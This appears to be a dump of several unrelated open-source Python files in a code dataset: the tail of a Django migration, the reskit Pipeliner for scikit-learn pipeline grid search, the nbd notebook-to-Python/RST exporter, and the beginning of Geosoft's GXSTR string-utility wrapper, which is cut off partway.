'title': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['public_project'] | bsd-3-clause | -2,835,805,165,672,189,400 | 81.18797 | 227 | 0.558803 | false |
neuro-ml/reskit | reskit/core.py | 1 | 21723 | """ Core classes. """
from sklearn.externals.joblib import Parallel, delayed
from sklearn.model_selection import cross_val_score, cross_val_predict
from sklearn.model_selection import GridSearchCV
from sklearn.metrics.scorer import check_scoring
from sklearn.pipeline import Pipeline
from sklearn.base import TransformerMixin, BaseEstimator
from collections import OrderedDict
from itertools import product
from pandas import DataFrame
from pickle import dump, load
from numpy import mean, std, hstack, vstack, zeros, array
from time import time
import os
class Pipeliner(object):
"""
An object which allows you to test different data preprocessing
pipelines and prediction models at once.
You will need to specify a name of each preprocessing and prediction
step and possible objects performing each step. Then Pipeliner will
combine these steps to different pipelines, excluding forbidden
combinations; perform experiments according to these steps and present
results in convenient csv table. For example, for each pipeline's
classifier, Pipeliner will grid search on cross-validation to find the best
classifier's parameters and report metric mean and std for each tested
pipeline. Pipeliner also allows you to cache interim calculations to
avoid unnecessary recalculations.
Parameters
----------
steps : list of tuples
List of (step_name, transformers) tuples, where transformers is a
list of tuples (step_transformer_name, transformer). ``Pipeliner``
will create ``plan_table`` from this ``steps``, combining all
possible combinations of transformers, switching transformers on
each step.
eval_cv : int, cross-validation generator or an iterable, optional
Determines the evaluation cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross validation,
- integer, to specify the number of folds in a ``(Stratified)KFold``,
- An object to be used as cross-validation generator.
- A list or iterable yielding train, test splits.
For integer/None inputs, if the estimator is a classifier and ``y``
is either binary or multiclass, ``StratifiedKFold`` is used. In all
other cases, ``KFold`` is used.
Refer scikit-learn ``User Guide`` for the various cross-validation strategies that
can be used here.
grid_cv : int, cross-validation generator or an iterable, optional
Determines the grid search cross-validation splitting strategy.
Possible inputs for cv are the same as for ``eval_cv``.
param_grid : dict of dictionaries
Dictionary with classifiers names (string) as keys. The keys are
possible classifiers names in ``steps``. Each key corresponds to
grid search parameters.
banned_combos : list of tuples
List of (transformer_name_1, transformer_name_2) tuples. Each row
with both transformers will be removed from ``plan_table``.
Attributes
----------
plan_table : pandas DataFrame
Plan of pipelines evaluation. Created from ``steps``.
named_steps: dict of dictionaries
Dictionary with steps names as keys. Each key corresponds to
dictionary with transformers names from ``steps`` as keys.
You can get any transformer object from this dictionary.
Examples
--------
>>> from sklearn.datasets import make_classification
>>> from sklearn.preprocessing import StandardScaler
>>> from sklearn.preprocessing import MinMaxScaler
>>> from sklearn.model_selection import StratifiedKFold
>>> from sklearn.linear_model import LogisticRegression
>>> from sklearn.svm import SVC
>>> from reskit.core import Pipeliner
>>> X, y = make_classification()
>>> scalers = [('minmax', MinMaxScaler()), ('standard', StandardScaler())]
>>> classifiers = [('LR', LogisticRegression()), ('SVC', SVC())]
>>> steps = [('Scaler', scalers), ('Classifier', classifiers)]
>>> grid_cv = StratifiedKFold(n_splits=5, shuffle=True, random_state=0)
>>> eval_cv = StratifiedKFold(n_splits=5, shuffle=True, random_state=1)
>>> param_grid = {'LR' : {'penalty' : ['l1', 'l2']},
>>> 'SVC' : {'kernel' : ['linear', 'poly', 'rbf', 'sigmoid']}}
>>> pipe = Pipeliner(steps, eval_cv=eval_cv, grid_cv=grid_cv, param_grid=param_grid)
>>> pipe.get_results(X=X, y=y, scoring=['roc_auc'])
"""
def __init__(self, steps, grid_cv, eval_cv, param_grid=dict(),
banned_combos=list()):
steps = OrderedDict(steps)
columns = list(steps)
for column in columns:
steps[column] = OrderedDict(steps[column])
def accept_from_banned_combos(row_keys, banned_combo):
if set(banned_combo) - set(row_keys) == set():
return False
else:
return True
column_keys = [list(steps[column]) for column in columns]
plan_rows = list()
for row_keys in product(*column_keys):
accept = list()
for bnnd_cmb in banned_combos:
accept += [accept_from_banned_combos(row_keys, bnnd_cmb)]
if all(accept):
row_of_plan = OrderedDict()
for column, row_key in zip(columns, row_keys):
row_of_plan[column] = row_key
plan_rows.append(row_of_plan)
self.plan_table = DataFrame().from_dict(plan_rows)[columns]
self.named_steps = steps
self.eval_cv = eval_cv
self.grid_cv = grid_cv
self.param_grid = param_grid
self._cached_X = OrderedDict()
self.best_params = dict()
self.scores = dict()
def get_results(self, X, y=None, caching_steps=list(), scoring='accuracy',
logs_file='results.log', collect_n=None):
"""
Gives results dataframe by defined pipelines.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
caching_steps : list of strings
Steps which won’t be recalculated for each new pipeline.
If in previous pipeline exists the same steps, ``Pipeliner``
will start from this step.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or a scorer
callable object / function with signature
``scorer(estimator, X, y)``. If None, the score method of
the estimator is used.
logs_file : string
File name where logs will be saved.
collect_n : int
If not None scores will be calculated in following way. Each
score will be corresponds to average score on cross-validation
scores. The only thing that is changing for each score is
random_state, it shifts.
Returns
-------
results : DataFrame
Dataframe with all results about pipelines.
"""
if isinstance(scoring, str):
scoring = [scoring]
columns = list(self.plan_table.columns)
without_caching = [step for step in columns
if step not in caching_steps]
for metric in scoring:
grid_steps = ['grid_{}_mean'.format(metric),
'grid_{}_std'.format(metric),
'grid_{}_best_params'.format(metric)]
eval_steps = ['eval_{}_mean'.format(metric),
'eval_{}_std'.format(metric),
'eval_{}_scores'.format(metric)]
columns += grid_steps + eval_steps
results = DataFrame(columns=columns)
columns = list(self.plan_table.columns)
results[columns] = self.plan_table
with open(logs_file, 'w+') as logs:
N = len(self.plan_table.index)
for idx in self.plan_table.index:
print('Line: {}/{}'.format(idx + 1, N))
logs.write('Line: {}/{}\n'.format(idx + 1, N))
logs.write('{}\n'.format(str(self.plan_table.loc[idx])))
row = self.plan_table.loc[idx]
caching_keys = list(row[caching_steps].values)
time_point = time()
X_featured, y = self.transform_with_caching(X, y, caching_keys)
spent_time = round(time() - time_point, 3)
logs.write('Got Features: {} sec\n'.format(spent_time))
for metric in scoring:
logs.write('Scoring: {}\n'.format(metric))
ml_keys = list(row[without_caching].values)
time_point = time()
grid_res = self.get_grid_search_results(X_featured, y,
ml_keys,
metric)
spent_time = round(time() - time_point, 3)
logs.write('Grid Search: {} sec\n'.format(spent_time))
logs.write('Grid Search Results: {}\n'.format(grid_res))
for key, value in grid_res.items():
results.loc[idx][key] = value
time_point = time()
scores = self.get_scores(X_featured, y,
ml_keys,
metric,
collect_n)
spent_time = round(time() - time_point, 3)
logs.write('Got Scores: {} sec\n'.format(spent_time))
mean_key = 'eval_{}_mean'.format(metric)
scores_mean = mean(scores)
results.loc[idx][mean_key] = scores_mean
logs.write('Scores mean: {}\n'.format(scores_mean))
std_key = 'eval_{}_std'.format(metric)
scores_std = std(scores)
results.loc[idx][std_key] = scores_std
logs.write('Scores std: {}\n'.format(scores_std))
scores_key = 'eval_{}_scores'.format(metric)
results.loc[idx][scores_key] = str(scores)
logs.write('Scores: {}\n\n'.format(str(scores)))
return results
def transform_with_caching(self, X, y, row_keys):
"""
Transforms ``X`` with caching.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
row_keys : list of strings
List of transformers names. ``Pipeliner`` takes
transformers from ``named_steps`` using keys from
``row_keys`` and creates pipeline to transform.
Returns
-------
transformed_data : (X, y) tuple, where X and y array-like
Data transformed corresponding to pipeline, created from
``row_keys``, to (X, y) tuple.
"""
columns = list(self.plan_table.columns[:len(row_keys)])
def remove_unmatched_caching_X(row_keys):
cached_keys = list(self._cached_X)
unmatched_caching_keys = cached_keys.copy()
for row_key, cached_key in zip(row_keys, cached_keys):
if not row_key == cached_key:
break
unmatched_caching_keys.remove(row_key)
for unmatched_caching_key in unmatched_caching_keys:
del self._cached_X[unmatched_caching_key]
def transform_X_from_last_cached(row_keys, columns):
prev_key = list(self._cached_X)[-1]
for row_key, column in zip(row_keys, columns):
transformer = self.named_steps[column][row_key]
X = self._cached_X[prev_key]
self._cached_X[row_key] = transformer.fit_transform(X)
prev_key = row_key
if 'init' not in self._cached_X:
self._cached_X['init'] = X
transform_X_from_last_cached(row_keys, columns)
else:
row_keys = ['init'] + row_keys
columns = ['init'] + columns
remove_unmatched_caching_X(row_keys)
cached_keys = list(self._cached_X)
cached_keys_length = len(cached_keys)
for i in range(cached_keys_length):
del row_keys[0]
del columns[0]
transform_X_from_last_cached(row_keys, columns)
last_cached_key = list(self._cached_X)[-1]
return self._cached_X[last_cached_key], y
def get_grid_search_results(self, X, y, row_keys, scoring):
"""
Make grid search for pipeline, created from ``row_keys`` for
defined ``scoring``.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
row_keys : list of strings
List of transformers names. ``Pipeliner`` takes transformers
from ``named_steps`` using keys from ``row_keys`` and creates
pipeline to transform.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or a scorer
callable object / function with signature
``scorer(estimator, X, y)``. If None, the score method of the
estimator is used.
Returns
-------
results : dict
Dictionary with keys: ‘grid_{}_mean’, ‘grid_{}_std’ and
‘grid_{}_best_params’. In the middle of keys will be
corresponding scoring.
"""
classifier_key = row_keys[-1]
if classifier_key in self.param_grid:
columns = list(self.plan_table.columns)[-len(row_keys):]
steps = list()
for row_key, column in zip(row_keys, columns):
steps.append((row_key, self.named_steps[column][row_key]))
param_grid = dict()
for key, value in self.param_grid[classifier_key].items():
param_grid['{}__{}'.format(classifier_key, key)] = value
self.asdf = param_grid
self.asdfasdf = self.param_grid[classifier_key]
grid_clf = GridSearchCV(estimator=Pipeline(steps),
param_grid=param_grid,
scoring=scoring,
n_jobs=-1,
cv=self.grid_cv)
grid_clf.fit(X, y)
best_params = dict()
classifier_key_len = len(classifier_key)
for key, value in grid_clf.best_params_.items():
key = key[classifier_key_len + 2:]
best_params[key] = value
param_key = ''.join(row_keys) + str(scoring)
self.best_params[param_key] = best_params
results = dict()
for i, params in enumerate(grid_clf.cv_results_['params']):
if params == grid_clf.best_params_:
k = 'grid_{}_mean'.format(scoring)
results[k] = grid_clf.cv_results_['mean_test_score'][i]
k = 'grid_{}_std'.format(scoring)
results[k] = grid_clf.cv_results_['std_test_score'][i]
k = 'grid_{}_best_params'.format(scoring)
results[k] = str(best_params)
return results
else:
param_key = ''.join(row_keys) + str(scoring)
self.best_params[param_key] = dict()
results = dict()
results['grid_{}_mean'.format(scoring)] = 'NaN'
results['grid_{}_std'.format(scoring)] = 'NaN'
results['grid_{}_best_params'.format(scoring)] = 'NaN'
return results
def get_scores(self, X, y, row_keys, scoring, collect_n=None):
"""
Gives scores for prediction on cross-validation.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
row_keys : list of strings
List of transformers names. ``Pipeliner`` takes transformers
from ``named_steps`` using keys from ``row_keys`` and creates
pipeline to transform.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or a scorer
callable object / function with signature
``scorer(estimator, X, y)``. If None, the score method of the
estimator is used.
collect_n : list of strings
List of keys from data dictionary you want to collect and
create feature vectors.
Returns
-------
scores : array-like
Scores calculated on cross-validation.
"""
columns = list(self.plan_table.columns)[-len(row_keys):]
param_key = ''.join(row_keys) + str(scoring)
steps = list()
for row_key, column in zip(row_keys, columns):
steps.append((row_key, self.named_steps[column][row_key]))
steps[-1][1].set_params(**self.best_params[param_key])
if not collect_n:
scores = cross_val_score(Pipeline(steps), X, y,
scoring=scoring,
cv=self.eval_cv,
n_jobs=-1)
else:
init_random_state = self.eval_cv.random_state
scores = list()
for i in range(collect_n):
fold_prediction = cross_val_predict(Pipeline(steps), X, y,
cv=self.eval_cv,
n_jobs=-1)
metric = check_scoring(steps[-1][1],
scoring=scoring).__dict__['_score_func']
scores.append(metric(y, fold_prediction))
self.eval_cv.random_state += 1
self.eval_cv.random_state = init_random_state
return scores
class MatrixTransformer(TransformerMixin, BaseEstimator):
"""
Helps to add you own transformation through usual functions.
Parameters
----------
func : function
A function that transforms input data.
params : dict
Parameters for the function.
"""
def __init__(
self,
func,
**params):
self.func = func
self.params = params
def fit(self, X, y=None, **fit_params):
"""
Fits the data.
Parameters
----------
X : array-like
The data to fit. Should be a 3D array.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
return self
def transform(self, X, y=None):
"""
Transforms the data according to function you set.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
X = X.copy()
new_X = []
for i in range(len(X)):
new_X.append(self.func(X[i], **self.params))
return array(new_X)
class DataTransformer(TransformerMixin, BaseEstimator):
"""
Helps to add you own transformation through usual functions.
Parameters
----------
func : function
A function that transforms input data.
params : dict
Parameters for the function.
"""
def __init__(
self,
func,
**params):
self.func = func
self.params = params
def fit(self, X, y=None, **fit_params):
"""
Fits the data.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
return self
def transform(self, X, y=None):
"""
Transforms the data according to function you set.
Parameters
----------
X : array-like
The data to fit. Can be, for example a list, or an array at least 2d, or
dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
X = X.copy()
return self.func(X, **self.params)
__all__ = ['MatrixTransformer',
'DataTransformer',
'Pipeliner']
| bsd-3-clause | 620,806,418,496,660,200 | 36.42931 | 90 | 0.554655 | false |
lcary/nbd | nbd/export.py | 1 | 3791 | from abc import (ABCMeta, abstractmethod, abstractproperty)
from os import path as ospath
import logging
import nbformat
from nbconvert import (PythonExporter, RSTExporter)
from nbd.fileops import (get_file_id, write_file)
EXPORT_FORMAT_PYTHON = 'python'
EXPORT_FORMAT_RST = 'rst'
logger = logging.getLogger()
class ExporterWrapper(object):
NOT_IMPL_MSG = 'Exporter wrapper not implemented.'
__metaclass__ = ABCMeta
@abstractproperty
def file_extension(self):
raise NotImplementedError(self.NOT_IMPL_MSG)
@abstractmethod
def export(self, basename, notebook_node, filepath):
raise NotImplementedError(self.NOT_IMPL_MSG)
def _export_content(self, notebook_node, filepath):
"""
Exports notebook data in a given format to a file in the output dir.
Returns notebook content and resources.
"""
(content, resources) = self.exporter.from_notebook_node(notebook_node)
write_file(filepath, content, write_mode='w')
return (content, resources)
def _get_filepath(self, output_dir, basename):
filename = "{}.{}".format(basename, self.file_extension)
return ospath.join(output_dir, filename)
class PythonExporterWrapper(ExporterWrapper):
def __init__(self):
self.exporter = PythonExporter()
@property
def file_extension(self):
return 'py'
def export(self, basename, notebook_node, output_dir):
"""
Exports notebook data in python format.
"""
filepath = self._get_filepath(output_dir, basename)
self._export_content(notebook_node, filepath)
class RSTExporterWrapper(ExporterWrapper):
def __init__(self):
self.exporter = RSTExporter()
@property
def file_extension(self):
return 'rst'
def export(self, basename, notebook_node, output_dir):
"""
Exports notebook data in rst format.
"""
filepath = self._get_filepath(output_dir, basename)
(content, resources) = self._export_content(notebook_node, filepath)
self._export_resources(basename, output_dir, resources)
def _export_resources(self, basename, output_dir, resources):
"""
Exports any additional resources (e.g. PNG files in notebook)
"""
try:
for (filename, b64data) in resources['outputs'].items():
filepath = self._get_resource_filepath(output_dir, basename, filename)
write_file(filepath, b64data, write_mode='wb')
except AttributeError:
logger.debug('Unable to find resources in notebook when exporting RST.')
@classmethod
def _get_resource_filepath(cls, output_dir, basename, filename):
filename = get_file_id(basename + "__" + filename)
return ospath.join(output_dir, filename)
class NotebookExporter(object):
"""
Process a list of notebooks by creating a directory and exporting
notebooks to the specified formats (python, rst, and binary files)
"""
DEFAULT_EXPORT_FORMATS = (EXPORT_FORMAT_PYTHON, EXPORT_FORMAT_RST)
def __init__(self, nbformat_version, export_formats=None):
self.nbformat_version = nbformat_version
self._export_formats = self._get_export_formats(export_formats)
self.python_exporter = PythonExporterWrapper()
self.rst_exporter = RSTExporterWrapper()
def _get_export_formats(self, export_formats):
if export_formats is None:
return list(self.DEFAULT_EXPORT_FORMATS)
else:
return export_formats
def process_notebook(self, basename, filepath, output_dir):
"""
Reads a notebook of a given format, then exports data.
"""
notebook_node = nbformat.read(filepath, as_version=self.nbformat_version)
if EXPORT_FORMAT_PYTHON in self._export_formats:
self.python_exporter.export(basename, notebook_node, output_dir)
if EXPORT_FORMAT_RST in self._export_formats:
self.rst_exporter.export(basename, notebook_node, output_dir)
| mit | 7,295,198,112,324,375,000 | 30.330579 | 78 | 0.710367 | false |
GeosoftInc/gxpy | geosoft/gxapi/GXSTR.py | 1 | 48660 | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXSTR(gxapi_cy.WrapSTR):
"""
GXSTR class.
This library is not a class. Use the `GXSTR <geosoft.gxapi.GXSTR>` library functions
to work with and manipulate string variables. Since the
GX Programming Language does not provide string literal
tokens, you must use these functions for any string operations
you want to perform.
"""
def __init__(self, handle=0):
super(GXSTR, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXSTR <geosoft.gxapi.GXSTR>`
:returns: A null `GXSTR <geosoft.gxapi.GXSTR>`
:rtype: GXSTR
"""
return GXSTR()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Data Input
@classmethod
def scan_i(cls, str_val):
"""
Convert a string to a GX int.
:param str_val: String to convert to an integer
:type str_val: str
:returns: Resulting Integer, `iDUMMY <geosoft.gxapi.iDUMMY>` is bad integer
:rtype: int
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._scan_i(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def scan_date(cls, str_val, type):
"""
Convert a date string to a GX real.
:param str_val: Date string
:param type: :ref:`DATE_FORMAT`
:type str_val: str
:type type: int
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if conversion fails.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** OLD usage, use ScanForm_STR instead.
"""
ret_val = gxapi_cy.WrapSTR._scan_date(GXContext._get_tls_geo(), str_val.encode(), type)
return ret_val
@classmethod
def scan_form(cls, str_val, type):
"""
Convert a formated string to a real.
:param str_val: Date string
:param type: :ref:`GS_FORMATS`
:type str_val: str
:type type: int
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if conversion fails.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._scan_form(GXContext._get_tls_geo(), str_val.encode(), type)
return ret_val
@classmethod
def scan_r(cls, str_val):
"""
Convert a string to a GX real.
:param str_val: String to convert to a real
:type str_val: str
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if bad string.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._scan_r(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def scan_time(cls, str_val, type):
"""
Convert a time string to a GX real.
:param str_val: Date string
:param type: :ref:`TIME_FORMAT`
:type str_val: str
:type type: int
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if conversion fails.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** OLD usage, use ScanForm_STR instead.
"""
ret_val = gxapi_cy.WrapSTR._scan_time(GXContext._get_tls_geo(), str_val.encode(), type)
return ret_val
# File Name
@classmethod
def file_combine_parts(cls, drive, dir, file, ext, qual, file_name):
"""
Combine file parts to build a file name.
:param drive: Drive
:param dir: Directory
:param file: Name
:param ext: Extension
:param qual: Qualifiers
:param file_name: Destination string, can be same as input
:type drive: str
:type dir: str
:type file: str
:type ext: str
:type qual: str
:type file_name: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
file_name.value = gxapi_cy.WrapSTR._file_combine_parts(GXContext._get_tls_geo(), drive.encode(), dir.encode(), file.encode(), ext.encode(), qual.encode(), file_name.value.encode())
@classmethod
def file_ext(cls, ifile, ext, ofile, opt):
"""
Add a file extension onto a file name string.
:param ifile: File name to extend
:param ext: Extension if "", extenstion and '.' are stripped.
:param ofile: Extended file name (can be same as input)
:param opt: :ref:`FILE_EXT`
:type ifile: str
:type ext: str
:type ofile: str_ref
:type opt: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ofile.value = gxapi_cy.WrapSTR._file_ext(GXContext._get_tls_geo(), ifile.encode(), ext.encode(), ofile.value.encode(), opt)
@classmethod
def file_name_part(cls, file, file_part, part):
"""
Get part of a file name.
:param file: File name
:param file_part: Destination string, can be same as input
:param part: :ref:`STR_FILE_PART`
:type file: str
:type file_part: str_ref
:type part: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
file_part.value = gxapi_cy.WrapSTR._file_name_part(GXContext._get_tls_geo(), file.encode(), file_part.value.encode(), part)
@classmethod
def get_m_file(cls, in_str, out_str, index):
"""
Get the indexed filepath from a multiple filepath string
:param in_str: Input multifile string
:param out_str: Output filepath string
:param index: Index of file
:type in_str: str
:type out_str: str_ref
:type index: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The multifile string must use '|' as a delimiter.
Do not pass a string after calling `tokenize <geosoft.gxapi.GXSTR.tokenize>`.
"""
out_str.value = gxapi_cy.WrapSTR._get_m_file(GXContext._get_tls_geo(), in_str.encode(), out_str.value.encode(), index)
@classmethod
def remove_qualifiers(cls, ifile, ofile):
"""
Remove file qualifiers from a file name
:param ifile: Input file name
:param ofile: Output file name (can be same as input)
:type ifile: str
:type ofile: str_ref
.. versionadded:: 7.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ofile.value = gxapi_cy.WrapSTR._remove_qualifiers(GXContext._get_tls_geo(), ifile.encode(), ofile.value.encode())
# Formating
@classmethod
def format_crc(cls, pul_crc, buff, width):
"""
Convert a GX CRC value to a string.
:param pul_crc: CRC value to format
:param buff: Resulting string
:param width: Width of the field
:type pul_crc: int
:type buff: str_ref
:type width: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_crc(GXContext._get_tls_geo(), pul_crc, buff.value.encode(), width)
@classmethod
def format_date(cls, real, buff, width, type):
"""
Convert a GX real to a date string.
:param real: Date value in decimal years to format
:param buff: Resulting string
:param width: Width of the field
:param type: :ref:`DATE_FORMAT`
:type real: float
:type buff: str_ref
:type width: int
:type type: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_date(GXContext._get_tls_geo(), real, buff.value.encode(), width, type)
@classmethod
def format_i(cls, value, buff, width):
"""
Convert a GX int to a string.
:param value: Value to format
:param buff: Resulting string
:param width: Width of the field
:type value: int
:type buff: str_ref
:type width: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_i(GXContext._get_tls_geo(), value, buff.value.encode(), width)
@classmethod
def format_r(cls, real, buff, width, sig):
"""
Convert a GX real to a string with significant digits.
:param real: Value to format
:param buff: Resulting string
:param width: Width of the field
:param sig: Significant digits
:type real: float
:type buff: str_ref
:type width: int
:type sig: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_r(GXContext._get_tls_geo(), real, buff.value.encode(), width, sig)
@classmethod
def format_r2(cls, real, buff, width, sig):
"""
Convert a GX real to a string with given decimals.
:param real: Value to format
:param buff: Resulting string
:param width: Width of the field
:param sig: Decimals
:type real: float
:type buff: str_ref
:type width: int
:type sig: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_r2(GXContext._get_tls_geo(), real, buff.value.encode(), width, sig)
@classmethod
def format_double(cls, real, buff, type, width, dec):
"""
Convert a GX real to a string.
:param real: Value to format
:param buff: Resulting string
:param type: :ref:`GS_FORMATS`
:param width: Width of the field
:param dec: Significant digits/decimals
:type real: float
:type buff: str_ref
:type type: int
:type width: int
:type dec: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_double(GXContext._get_tls_geo(), real, buff.value.encode(), type, width, dec)
@classmethod
def format_time(cls, real, buff, width, deci, type):
"""
Convert a GX real to a time string.
:param real: Time value in decimal hours to format
:param buff: Resulting string
:param width: Width of the field
:param deci: Decimals to format with
:param type: :ref:`TIME_FORMAT`
:type real: float
:type buff: str_ref
:type width: int
:type deci: int
:type type: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_time(GXContext._get_tls_geo(), real, buff.value.encode(), width, deci, type)
# General
@classmethod
def escape(cls, str_val, opt):
"""
Convert/replace escape sequences in strings.
:param str_val: String to modify
:param opt: :ref:`STR_ESCAPE`
:type str_val: str_ref
:type opt: int
.. versionadded:: 5.0.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Escape characters:
\\a bell
\\b backspace
\\f formfeed
\\n new line
\\r carriage return
\\t tab
\\v vertical tab
\\" quote character
\\x take 'x' literally
\\ backslash
\\ooo octal up to 3 characters
\\xhh hex up to 2 characters
A common use of this function is to convert double-quote characters in
a user unput string to \\" so the string can be placed in a tokenized
string.
"""
str_val.value = gxapi_cy.WrapSTR._escape(GXContext._get_tls_geo(), str_val.value.encode(), opt)
@classmethod
def char_(cls, str_val):
"""
Returns the ASCII value of a character.
:param str_val: String to return ascii value of first character
:type str_val: str
:returns: ASCII value of first character in string.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._char_(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def char_n(cls, str_val, c, max):
"""
Returns the ASCII value of the n'th character.
:param str_val: String
:param c: Character to get
:param max: Maximum string length (unused)
:type str_val: str
:type c: int
:type max: int
:returns: ASCII value of n'th character in string.
The first character is 0.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._char_n(GXContext._get_tls_geo(), str_val.encode(), c, max)
return ret_val
@classmethod
def justify(cls, in_str, out_str, width, just):
"""
Justify a string
:param in_str: String to justify
:param out_str: Result string, can be same as input
:param width: Justification width
:param just: :ref:`STR_JUSTIFY`
:type in_str: str
:type out_str: str_ref
:type width: int
:type just: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the string is too big to fit in the number of display characters,
the output string will be "**" justified as specified.
"""
out_str.value = gxapi_cy.WrapSTR._justify(GXContext._get_tls_geo(), in_str.encode(), out_str.value.encode(), width, just)
@classmethod
def replacei_match_string(cls, istr, old, new_str):
"""
Replaces all occurances of match string by replacement string with case insensitive.
:param istr: Destination String
:param old: Match string to replace
:param new_str: Replacement string
:type istr: str_ref
:type old: str
:type new_str: str
.. versionadded:: 7.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the replacement string is "" (NULL character)
then the string to replace is removed from the
input string, and the string is shortened.
"""
